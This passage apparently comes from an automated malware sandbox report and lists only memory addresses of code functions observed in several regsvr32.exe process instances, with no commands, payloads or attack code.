                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005E7C3_2_0000000180005E7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180025E883_2_0000000180025E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002868C3_2_000000018002868C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180014E983_2_0000000180014E98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180014AA43_2_0000000180014AA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800126A83_2_00000001800126A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800036A83_2_00000001800036A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A6BC3_2_000000018002A6BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001CABC3_2_000000018001CABC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000EAC03_2_000000018000EAC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001B6D43_2_000000018001B6D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F2DC3_2_000000018000F2DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800202E03_2_00000001800202E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800226E03_2_00000001800226E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180019AF03_2_0000000180019AF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000BEF03_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180012EF83_2_0000000180012EF8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800297103_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800177103_2_0000000180017710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000C7403_2_000000018000C740
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020F443_2_0000000180020F44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023B483_2_0000000180023B48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800237483_2_0000000180023748
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800217543_2_0000000180021754
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800223583_2_0000000180022358
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180029F5C3_2_0000000180029F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B3683_2_000000018002B368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001BF703_2_000000018001BF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800253743_2_0000000180025374
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180007F743_2_0000000180007F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180021F7C3_2_0000000180021F7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800197883_2_0000000180019788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001B8C3_2_0000000180001B8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800283943_2_0000000180028394
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180013B943_2_0000000180013B94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001479C3_2_000000018001479C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E7A03_2_000000018000E7A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800087A43_2_00000001800087A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180017BA83_2_0000000180017BA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000EBAC3_2_000000018000EBAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001B3B83_2_000000018001B3B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180012BB83_2_0000000180012BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800257C03_2_00000001800257C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008BC03_2_0000000180008BC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800117C43_2_00000001800117C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800227E03_2_00000001800227E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001C00004_2_001C0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800083F84_2_00000001800083F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800264104_2_0000000180026410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000680F4_2_000000018000680F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025C304_2_0000000180025C30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800136744_2_0000000180013674
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017C8C4_2_0000000180017C8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A48C4_2_000000018000A48C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180011CCC4_2_0000000180011CCC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BEF04_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800297104_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026F144_2_0000000180026F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800237484_2_0000000180023748
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001D584_2_0000000180001D58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B3684_2_000000018002B368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800013784_2_0000000180001378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800105904_2_0000000180010590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800091A84_2_00000001800091A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800165E44_2_00000001800165E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018FE84_2_0000000180018FE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001ABE84_2_000000018001ABE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029DF04_2_0000000180029DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800243F44_2_00000001800243F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015DF44_2_0000000180015DF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800011F44_2_00000001800011F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800247FC4_2_00000001800247FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001DBFC4_2_000000018001DBFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FE084_2_000000018000FE08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001100C4_2_000000018001100C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180027E144_2_0000000180027E14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B6184_2_000000018000B618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800232204_2_0000000180023220
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180027C284_2_0000000180027C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020A344_2_0000000180020A34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800076344_2_0000000180007634
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180022E384_2_0000000180022E38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E6384_2_000000018000E638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002143C4_2_000000018002143C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001303C4_2_000000018001303C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A8404_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800038404_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B4444_2_000000018000B444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F0484_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002AC4C4_2_000000018002AC4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800100504_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800102504_2_0000000180010250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800030504_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180011E5C4_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000445C4_2_000000018000445C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C85C4_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800034604_2_0000000180003460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026A644_2_0000000180026A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800042644_2_0000000180004264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029C6C4_2_0000000180029C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001586C4_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000406C4_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E06C4_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BC704_2_000000018000BC70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F6784_2_000000018000F678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E2784_2_000000018000E278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001447C4_2_000000018001447C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180005E7C4_2_0000000180005E7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026C804_2_0000000180026C80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180010C844_2_0000000180010C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025E884_2_0000000180025E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800160884_2_0000000180016088
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800028884_2_0000000180002888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002868C4_2_000000018002868C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FC8C4_2_000000018000FC8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002D0984_2_000000018002D098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014E984_2_0000000180014E98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014AA44_2_0000000180014AA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800126A84_2_00000001800126A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800036A84_2_00000001800036A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800154B84_2_00000001800154B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A6BC4_2_000000018002A6BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CABC4_2_000000018001CABC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000EAC04_2_000000018000EAC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002C6C84_2_000000018002C6C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002C2C84_2_000000018002C2C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800064D04_2_00000001800064D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B6D44_2_000000018001B6D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800180D44_2_00000001800180D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800054D84_2_00000001800054D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F2DC4_2_000000018000F2DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800202E04_2_00000001800202E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002CCE04_2_000000018002CCE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800226E04_2_00000001800226E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800254E44_2_00000001800254E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800184E84_2_00000001800184E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800010E84_2_00000001800010E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180019AF04_2_0000000180019AF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E8F04_2_000000018000E8F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A0F84_2_000000018002A0F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012EF84_2_0000000180012EF8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800199004_2_0000000180019900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800119044_2_0000000180011904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F9084_2_000000018001F908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002490C4_2_000000018002490C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001890C4_2_000000018001890C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001D5104_2_000000018001D510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800177104_2_0000000180017710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180003D184_2_0000000180003D18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002191C4_2_000000018002191C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800163204_2_0000000180016320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001D1284_2_000000018001D128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000D12C4_2_000000018000D12C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800149304_2_0000000180014930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800085344_2_0000000180008534
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C7404_2_000000018000C740
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020F444_2_0000000180020F44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CD444_2_000000018001CD44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023B484_2_0000000180023B48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B9484_2_000000018000B948
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800217544_2_0000000180021754
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800223584_2_0000000180022358
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029F5C4_2_0000000180029F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000796C4_2_000000018000796C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001BF704_2_000000018001BF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800253744_2_0000000180025374
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180007F744_2_0000000180007F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180021F7C4_2_0000000180021F7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800197884_2_0000000180019788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001B8C4_2_0000000180001B8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028D944_2_0000000180028D94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800283944_2_0000000180028394
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180013B944_2_0000000180013B94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001479C4_2_000000018001479C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E7A04_2_000000018000E7A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800087A44_2_00000001800087A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017BA84_2_0000000180017BA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000EBAC4_2_000000018000EBAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012BB84_2_0000000180012BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B3B84_2_000000018001B3B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800171B84_2_00000001800171B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018DBC4_2_0000000180018DBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800257C04_2_00000001800257C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180008BC04_2_0000000180008BC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800117C44_2_00000001800117C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800141C84_2_00000001800141C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B1D44_2_000000018002B1D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023DDC4_2_0000000180023DDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800227E04_2_00000001800227E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF75312B05_2_000007FEF75312B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF753443C5_2_000007FEF753443C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF75353FB5_2_000007FEF75353FB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF7534A705_2_000007FEF7534A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF7535E015_2_000007FEF7535E01
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF7535CAD5_2_000007FEF7535CAD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF75368505_2_000007FEF7536850
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_001400005_2_00140000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800264105_2_0000000180026410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180025C305_2_0000000180025C30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180001D585_2_0000000180001D58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180011E5C5_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002C6C85_2_000000018002C6C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002C2C85_2_000000018002C2C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026F145_2_0000000180026F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800163205_2_0000000180016320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800013785_2_0000000180001378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180018FE85_2_0000000180018FE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001ABE85_2_000000018001ABE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800243F45_2_00000001800243F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800083F85_2_00000001800083F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800247FC5_2_00000001800247FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001DBFC5_2_000000018001DBFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001100C5_2_000000018001100C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180027C285_2_0000000180027C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002143C5_2_000000018002143C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001303C5_2_000000018001303C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A8405_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800038405_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B4445_2_000000018000B444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F0485_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002AC4C5_2_000000018002AC4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800100505_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800030505_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000445C5_2_000000018000445C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C85C5_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800034605_2_0000000180003460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029C6C5_2_0000000180029C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001586C5_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000406C5_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E06C5_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BC705_2_000000018000BC70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001447C5_2_000000018001447C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026C805_2_0000000180026C80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180010C845_2_0000000180010C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800160885_2_0000000180016088
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800028885_2_0000000180002888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180017C8C5_2_0000000180017C8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000FC8C5_2_000000018000FC8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002D0985_2_000000018002D098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800154B85_2_00000001800154B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180011CCC5_2_0000000180011CCC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800064D05_2_00000001800064D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800180D45_2_00000001800180D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800054D85_2_00000001800054D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002CCE05_2_000000018002CCE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800254E45_2_00000001800254E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800184E85_2_00000001800184E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800010E85_2_00000001800010E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E8F05_2_000000018000E8F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A0F85_2_000000018002A0F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800199005_2_0000000180019900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800119045_2_0000000180011904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F9085_2_000000018001F908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002490C5_2_000000018002490C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001890C5_2_000000018001890C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D5105_2_000000018001D510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180003D185_2_0000000180003D18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002191C5_2_000000018002191C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D1285_2_000000018001D128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D12C5_2_000000018000D12C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800149305_2_0000000180014930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800085345_2_0000000180008534
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001CD445_2_000000018001CD44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B9485_2_000000018000B948
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000796C5_2_000000018000796C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800105905_2_0000000180010590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180028D945_2_0000000180028D94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800091A85_2_00000001800091A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800171B85_2_00000001800171B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180018DBC5_2_0000000180018DBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800141C85_2_00000001800141C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002B1D45_2_000000018002B1D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180023DDC5_2_0000000180023DDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800165E45_2_00000001800165E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029DF05_2_0000000180029DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015DF45_2_0000000180015DF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800011F45_2_00000001800011F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000FE085_2_000000018000FE08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180027E145_2_0000000180027E14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B6185_2_000000018000B618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800232205_2_0000000180023220
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180020A345_2_0000000180020A34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800076345_2_0000000180007634
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180022E385_2_0000000180022E38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E6385_2_000000018000E638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800102505_2_0000000180010250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026A645_2_0000000180026A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800042645_2_0000000180004264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800136745_2_0000000180013674
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F6785_2_000000018000F678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E2785_2_000000018000E278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180005E7C5_2_0000000180005E7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180025E885_2_0000000180025E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002868C5_2_000000018002868C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180014E985_2_0000000180014E98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180014AA45_2_0000000180014AA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800126A85_2_00000001800126A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800036A85_2_00000001800036A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A6BC5_2_000000018002A6BC
